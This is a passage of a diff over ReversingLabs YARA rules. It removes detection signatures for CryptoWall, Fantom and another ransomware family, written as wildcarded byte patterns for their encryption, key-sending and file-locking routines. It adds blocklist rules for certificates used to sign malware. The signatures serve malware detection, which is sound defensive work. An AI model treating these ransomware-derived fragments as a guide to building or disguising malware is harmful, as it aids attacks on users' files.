-            45 ?? 83 7D ?? ?? 72 ?? 53 FF 15 ?? ?? ?? ?? EB ?? FF 75 ?? FF 15 ?? ?? ?? ?? 57 FF
-            15 ?? ?? ?? ?? 5B FF 75 ?? FF 15 ?? ?? ?? ?? 5F 8B 45 ?? 5E 83 C5 ?? C9 C2
-        }
-		$create_key = {
-            55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 56 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 53 57 8D 45 ?? 50 8D 45 ?? 50
-            33 DB 53 6A ?? 53 FF 75 ?? BE ?? ?? ?? ?? 89 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 50 8D 45 ?? 50 53 6A ?? 53 FF 35 ?? ?? ?? ??
-            FF D6 FF 75 ?? FF 15 ?? ?? ?? ?? 83 E0 ?? 83 C0 ?? 50 89 45 ?? 8D 45 ?? 50 FF 75 ??
-            53 53 53 FF 75 ?? FF D6 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 4D ?? 8B 35 ?? ?? ?? ??
-            03 C8 51 6A ?? FF D6 8B F8 89 7D ?? 3B FB 0F 84 ?? ?? ?? ?? FF 75 ?? FF 75 ?? 57 FF
-            15 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 8B 45 ?? 03 C7 50 FF 15 ?? ?? ?? ?? 8B 4D ?? 83
-            C4 ?? 8D 45 ?? 50 8B 45 ?? 53 6A ?? 03 C8 51 57 8B 3D ?? ?? ?? ?? FF D7 85 C0 74 ??
-            FF 75 ?? 6A ?? FF D6 8B F0 3B F3 74 ?? 8B 4D ?? 8D 45 ?? 50 8B 45 ?? 56 6A ?? 03 C8
-            51 FF 75 ?? FF D7 33 FF 38 1E 74 ?? 8B C6 80 38 ?? 75 ?? 40 40 8A 08 88 0C 37 47 40
-            38 18 75 ?? 88 1C 37 EB ?? 8B 75 ?? FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? 8B 75 ?? FF 75
-            ?? FF 15 ?? ?? ?? ?? 5F 5B EB ?? 8B 75 ?? 8B C6 5E 83 C5 ?? C9 C2
-        }
-		$create_lst_file = {
-            55 8D 6C 24 ?? 81 EC ?? ?? ?? ?? 53 56 68 ?? ?? ?? ?? 33 F6 6A ?? 89 75 ?? FF 15 ??
-            ?? ?? ?? 8B D8 3B DE 0F 84 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 56 FF 15 ?? ?? ?? ?? 85 C0
-            0F 85 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 8B 45 ?? 8B 38 8D 45
-            ?? 50 53 83 C7 ?? FF 15 ?? ?? ?? ?? 03 C0 50 53 FF 75 ?? FF 17 8B 45 ?? 8B 08 8D 55
-            ?? 52 6A ?? 68 ?? ?? ?? ?? 50 FF 51 ?? 53 E8 ?? ?? ?? ?? 85 C0 75 ?? 8B 45 ?? 8B 08
-            8D 55 ?? 52 6A ?? 68 ?? ?? ?? ?? 50 FF 51 ?? 8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ??
-            85 C0 0F 85 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ??
-            8B 3D ?? ?? ?? ?? 56 56 56 56 6A ?? 50 56 68 ?? ?? ?? ?? FF D7 89 45 ?? 3B C6 0F 84
-            ?? ?? ?? ?? 83 C0 ?? 50 6A ?? FF 15 ?? ?? ?? ?? 89 45 ?? 3B C6 0F 84 ?? ?? ?? ?? 56
-            56 FF 75 ?? 50 6A ?? FF 75 ?? 56 68 ?? ?? ?? ?? FF D7 8D 45 ?? 50 6A ?? 68 ?? ?? ??
-            ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 83 E0 ?? 83
-            C0 ?? 89 45 ?? 8D 45 ?? 50 8D 45 ?? 50 56 6A ?? 56 FF 75 ?? BF ?? ?? ?? ?? 89 7D ??
-            FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 57 8D 45 ?? 50 8D 45 ?? 50 56 6A ?? 56 FF
-            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? FF 75 ?? 8D 45 ?? 50 FF 75 ?? 56 56
-            56 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 6A ?? 53 56 FF 15 ?? ?? ??
-            ?? FF 75 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8D 04 43 50 FF 15 ?? ?? ?? ?? 83 C4
-            ?? 57 53 FF 15 ?? ?? ?? ?? 56 6A ?? 6A ?? 56 56 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ??
-            89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 8D 4D ?? 51 FF 75 ?? FF 75 ?? 50 FF 15 ?? ??
-            ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 45 ?? 3B 45 ?? 0F 85 ?? ?? ?? ?? 56 8D 45 ?? 50 57
-            8D 45 ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 39 7D ?? 75 ?? FF 75 ?? C7 45 ??
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 75 ?? 53 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F8 3B FE 74 ?? 56 6A ?? 57 56 FF 15 ?? ?? ?? ?? 85 C0
-            74 ?? FF 75 ?? 68 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 8D 04 47 50 FF 15 ?? ?? ?? ?? 83
-            C4 ?? 56 57 53 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? EB ?? FF 75 ?? FF 15 ?? ?? ??
-            ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ??
-            5F 8B 45 ?? 8B 08 50 FF 51 ?? 53 FF 15 ?? ?? ?? ?? 8B 45 ?? 5E 5B 83 C5 ?? C9 C2
-        }
-		$enumerate_resources = {
-            55 8B EC 83 EC ?? 8D 45 ?? 50 FF 75 ?? 6A ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 85 C0 0F 85
-            ?? ?? ?? ?? 53 8B 1D ?? ?? ?? ?? 56 57 BE ?? ?? ?? ?? 56 6A ?? FF D3 8B F8 89 7D ??
-            85 FF [2-8] 83 4D ?? ?? 8D 45 ?? 50 57 8D 45 ?? 50 FF 75 ?? 89 75 ?? E8
-            ?? ?? ?? ?? 85 C0 75 ?? 39 45 ?? 74 ?? 8D 77 ?? F6 46 ?? ?? 74 ?? 8D 46 ?? 50 [0-3]
-            E8 ?? ?? ?? ?? EB ?? 83 7E ?? ?? 75 ?? FF 36 FF 15 ?? ?? ?? ?? 8D 44 00 ?? 50 6A
-            ?? FF D3 8B F8 85 FF 74 ?? FF 36 57 FF 15 ?? ?? ?? ?? [0-5] 57 E8 ?? ?? ??
-            ?? 57 FF 15 ?? ?? ?? ?? 83 C6 ?? FF 4D ?? 75 ?? 8B 7D ?? 57 FF 15 ?? ?? ?? ?? FF 75
-            ?? E8 ?? ?? ?? ?? 5F 5E 5B C9 C2
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( $create_key_file and $create_lst_file and $enumerate_resources and $encrypt_files ) or ( $create_key and $enumerate_resources and $encrypt_files ) )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Rabah Azrarak" and pe.signatures [ i ] . serial == "0e:cd:46:0c:e1:4b:d8:ef:29:26:da:2c:d9:a4:41:76" and 1463035153 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Fantom : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_5E75E997F3D70Bb8C182D56B25B7D836 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Fantom ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "cd32de8b-2c14-5fb4-be79-365d9848f341"
-		date = "2021-08-12"
-		modified = "2021-08-12"
+		id = "3578b97f-1d87-517a-8ea9-17606017e46a"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.Fantom.yara#L1-L97"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12666-L12682"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "f2aaa9776b7ca302052b3303d45df24cc151a4efc7ea9f4bb3c1f53d10ded03a"
+		logic_hash = "a2c6a57759fb0717951f83a32c00deeae82cad772b6cb7f60fa96232b6b82560"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Fantom"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_files_1 = {
-            00 72 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ??
-            26 DE ?? 26 DE ?? 02 28 ?? ?? ?? ?? 13 ?? 02 28 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02 28
-            ?? ?? ?? ?? 1F ?? 28 ?? ?? ?? ?? [1-2] 02 72 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 [1-2] 20
-            ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 6F
-            ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 02 7B ?? ?? ?? ?? 02 7B
-            ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 20 ?? ?? ?? ?? 8D ?? ??
-            ?? ?? 13 ?? 11 ?? 16
-        }
-		$encrypt_files_2 = {
-            72 ?? ?? ?? ?? A2 11 ?? 17 72 ?? ?? ?? ?? A2 11 ?? 18 72 ?? ?? ?? ?? A2 11 ??
-            19 72 ?? ?? ?? ?? A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 1B 72 ?? ?? ?? ?? A2 11
-            ?? 1C 72 ?? ?? ?? ?? A2 11 ?? 1D 72 ?? ?? ?? ?? A2 11 ?? 1E 72 ?? ?? ?? ?? A2
-            11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ??
-            ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ??
-            1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ??
-            ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ??
-            72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2
-            11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ??
-            ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ??
-            1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ??
-            ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ??
-            72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2
-            11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ??
-            ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ??
-            1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ??
-            ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ??
-            72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2
-            11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ??
-            ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ??
-            1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ??
-            ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ??
-            72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2
-            11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ??
-            ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? ?? A2 11
-        }
-		$lockfile = {
-            02 7B ?? ?? ?? ?? 16 FE ?? 3A ?? ?? ?? ?? 21 EA 17 ?? ?? ?? ?? ?? ?? ??
-            03 73 ?? ?? ?? ?? [2-4] 6F ?? ?? ?? ?? [2-4] 21 00 65 CD 1D
-            00 00 00 00 FE ?? 16 FE ?? 2D ?? [2-4] FE ?? 16 FE ?? 2D ?? 03 28
-            ?? ?? ?? ?? ?? 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? [1-2] 28 ?? ?? ?? ?? [1-2]
-            6F ?? ?? ?? ?? [1-2] 02 ?? [1-2] 28 ?? ?? ?? ?? [1-2] 03 [1-2] 28 ?? ??
-            ?? ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? [1-2] ?? FE ??
-            16 FE ?? 2D ?? 2B ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            2B ?? 03 28 ?? ?? ?? ?? ?? 28 ?? ?? ?? ?? 04 6F ?? ?? ?? ?? [1-2] 28 ??
-            ?? ?? ?? [1-2] 6F ?? ?? ?? ?? [1-2] 02 ?? [1-2] 28 ?? ?? ?? ?? [1-2] 03
-            [1-2] 28 ?? ?? ?? ?? 03 03 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ??
-            2A
-        }
-		$lockdir = {
-            03 28 ?? ?? ?? ?? 0A 03 28 ?? ?? ?? ?? 0B 16 0C 08 06 8E 69 FE ?? 2C ??
-            00 06 08 9A 28 ?? ?? ?? ?? 0D 05 09 28 ?? ?? ?? ?? 16 FE ?? 2D ?? 02 25
-            7B ?? ?? ?? ?? 17 58 7D ?? ?? ?? ?? 02 06 08 9A 04 28 ?? ?? ?? ?? DE ??
-            26 DE ?? 26 DE ?? 08 17 58 0C 2B ?? 16 0C 08 07 8E 69 FE ?? 2C ?? 00 02
-            07 08 9A 04 05 28 ?? ?? ?? ?? 02 07 08 9A 04 28 ?? ?? ?? ?? DE ?? 26 DE
-            ?? 26 DE ?? 08 17 58 0C 2B ?? 2A
-        }
-		$sendkey = {
-            00 02 7C ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 73 ?? ?? ?? ?? 0B 73 ?? ?? ?? ??
-            0C 08 72 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 08 72 ?? ?? ?? ??
-            02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 08 72 ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F
-            ?? ?? ?? ?? 08 72 ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 07 03 72 ?? ?? ?? ?? 08
-            6F ?? ?? ?? ?? 26 07 6F ?? ?? ?? ?? DE ?? 26 DE ?? 2A
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( ( all of ( $encrypt_files_* ) ) and $lockfile and $lockdir and $sendkey )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Primetech Ltd." and pe.signatures [ i ] . serial == "5e:75:e9:97:f3:d7:0b:b8:c1:82:d5:6b:25:b7:d8:36" and 1324252800 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Win32_Ransomware_Cryptowall : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Cert_Blocklist_D5690D94F15315E143Db10Af35497Dc5 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects CryptoWall ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "06d8b106-d69a-526a-8e16-c95d39eb2993"
-		date = "2020-06-26"
-		modified = "2020-07-15"
+		id = "324b2e2f-bad7-5ac4-864c-044d99fa01dc"
+		date = "2020-08-05"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win32.Ransomware.CryptoWall.yara#L3-L312"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L12684-L12702"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "74baa04ee506732e0bb64a77cfd2d2216fcc978f13447ef07862e0116c093c14"
+		logic_hash = "4ac17d0f0e4ef2bb5f6cda8e7cb07a641d49c83465a0a80c46ff6e0e752d1847"
 		score = 75
-		quality = 88
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		quality = 90
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "CryptoWall"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$v30_entrypoint = {
-            55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 85 C0 0F 84 9A 00 00 00 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 75 7E C7 45 ?? ?? ?? ?? ??
-            8D 45 ?? 50 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 65 8B 4D ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2
-            E8 ?? ?? ?? ?? 8B 40 ?? A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
-            75 19 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 6A
-            ?? 6A ?? E8 ?? ?? ?? ?? 8B 50 ?? FF D2 33 C0 8B E5 5D C2
-        }
-		$v20_entrypoint = {
-            55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 85 C0 0F 84 A3 00 00 00 E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 0F 85 83 00 00 00 C7 45 ??
-            ?? ?? ?? ?? 8D 45 ?? 50 6A ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 6A 8B 4D ?? 51 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 90 ?? ??
-            ?? ?? FF D2 E8 ?? ?? ?? ?? 8B 40 ?? A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 19 C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B 50 ?? FF D2 33 C0 8B E5 5D C2
-        }
-		$v30_api_load = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 50 01 00 00 8B 45 ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 34 01 00 00 B9 ?? ?? ?? ?? 6B D1 ?? 8B 45 ?? 8B 4D ?? 03 4C 10 ?? 89 4D ?? 8B
-            55 ?? 8B 45 ?? 03 42 ?? 89 45 ?? 8B 4D ?? 8B 55 ?? 03 51 ?? 89 55 ?? 8B 45 ?? 8B 4D ?? 03 48 ?? 89 4D ?? C7 45 ?? ?? ??
-            ?? ?? EB 09 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 8B 4D ?? 3B 48 ?? 0F 83 DA 00 00 00 8B 55 ?? 8B 45 ?? 8B 4D ?? 03 0C 90
-            51 E8 ?? ?? ?? ?? 83 C4 ?? 3B 45 ?? 0F 85 B7 00 00 00 BA ?? ?? ?? ?? 6B C2 ?? 8B 4D ?? 8B 54 01 ?? 8B 44 01 ?? 89 55 ??
-            89 45 ?? 8B 4D ?? 8B 55 ?? 0F B7 04 4A 8B 4D ?? 8B 14 81 3B 55 ?? 76 71 8B 45 ?? 8B 4D ?? 0F B7 14 41 8B 45 ?? 03 45 ??
-            8B 4D ?? 39 04 91 73 59 8B 55 ?? 8B 45 ?? 0F B7 0C 50 8B 55 ?? 8B 45 ?? 03 04 8A 89 45 ?? 74 3F 6A ?? 8B 4D ?? 51 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 55 ?? 8D 44 02 ?? 50 8D 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8D 45 ?? 50 6A ?? 8D 4D ??
-            51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 40 ?? FF D0 EB 16 8B 4D ?? 8B 55 ?? 0F B7 04 4A 8B 4D ?? 8B 55 ?? 03 14 81 89 55 ?? EB
-            05 E9 0E FF FF FF 8B 45 ?? 8B E5 5D C3
-        }
-		$v30_dll_load = {
-            55 8B EC 83 EC ?? E8 ?? ?? ?? ?? 89 45 ?? 83 7D ?? ?? 74 58 8B 45 ?? 8B 48 ?? 89 4D ?? 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45
-            ?? 8B 08 89 4D ?? 8B 55 ?? 3B 55 ?? 74 36 8B 45 ?? 89 45 ?? 8B 4D ?? 0F B7 51 ?? D1 EA 52 8B 45 ?? 8B 48 ?? 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 3B 45 ?? 75 08 8B 55 ?? 8B 42 ?? EB 0C 8B 45 ?? 8B 08 89 4D ?? EB C2 33 C0 8B E5 5D C3
-        }
-		$v30_calculate_hash = {
-            55 8B EC 83 EC ?? 56 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 5E 83 7D ?? ?? 74 58 8B 45 ?? 89 45 ?? 8B 4D ?? 89 4D ?? 8B 55
-            ?? 83 EA ?? 89 55 ?? 83 7D ?? ?? 74 3D 8B 45 ?? 66 8B 08 66 89 4D ?? 8B 75 ?? C1 EE ?? 0F B7 55 ?? 52 E8 ?? ?? ?? ?? 83
-            C4 ?? 0F B7 C0 33 45 ?? 25 ?? ?? ?? ?? 33 34 85 ?? ?? ?? ?? 89 75 ?? 8B 4D ?? 83 C1 ?? 89 4D ?? EB AE 8B 45 ?? 83 F0 ??
-            5E 8B E5 5D C3
-        }
-		$v30_1_find_file_1 = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 47 02 00 00 E8 ?? ?? ?? ?? 89 45
-            ?? 83 7D ?? ?? 0F 84 32 02 00 00 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 8B 4D ?? 0F B7 54 41 ?? 83 FA ?? 74 16 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 68
-            ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ??
-            ?? 0F 84 B2 01 00 00 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 84 01 00
-            00 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 83 E2 ?? 0F 85 A0 00 00 00 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 85 C0 0F 85 80 00 00 00 8D 4D ?? 51 8B 55 ?? 83 C2 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 69 C7 45 ?? ?? ??
-            ?? ?? 8D 45 ?? 50 8B 4D ?? 83 C1 ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 47 8B 45 ?? 50 8B 4D ?? 8B 11 52 8B
-            45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 1C 8B 4D ?? 83 C1 ?? 89 4D ?? 8B 55 ?? 8B 42 ?? 50 8B 4D ?? 51
-        }
-		$v30_1_find_file_2 = {
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? EB 67 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75
-            54 C7 45 ?? ?? ?? ?? ?? 8D 4D ?? 51 8B 55 ?? 83 C2 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 32 8B 4D ?? 51 E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 16 8B 55 ?? 52 8B 45 ?? 50 E8 30 FE FF FF 83 C4 ?? 03 45 ?? 89 45 ?? 8B 4D ?? 51 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 85 CE FE FF FF 8B 55 ?? 52 E8 ??
-            ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 7D ?? ?? 74 2E 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 50 8B 55 ?? 52 E8 ?? ?? ?? ?? 83
-            C4 ?? 3D ?? ?? ?? ?? 74 0E 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 89 4D ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4
-            ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B E5 5D C3
-        }
-		$v30_2_find_file_1 = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 ( 3B | 3D ) 02 00 00 E8 ?? ?? ??
-            ?? 89 45 ?? 83 7D ?? ?? 0F 84 ( 26 | 28 ) 02 00 00 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45
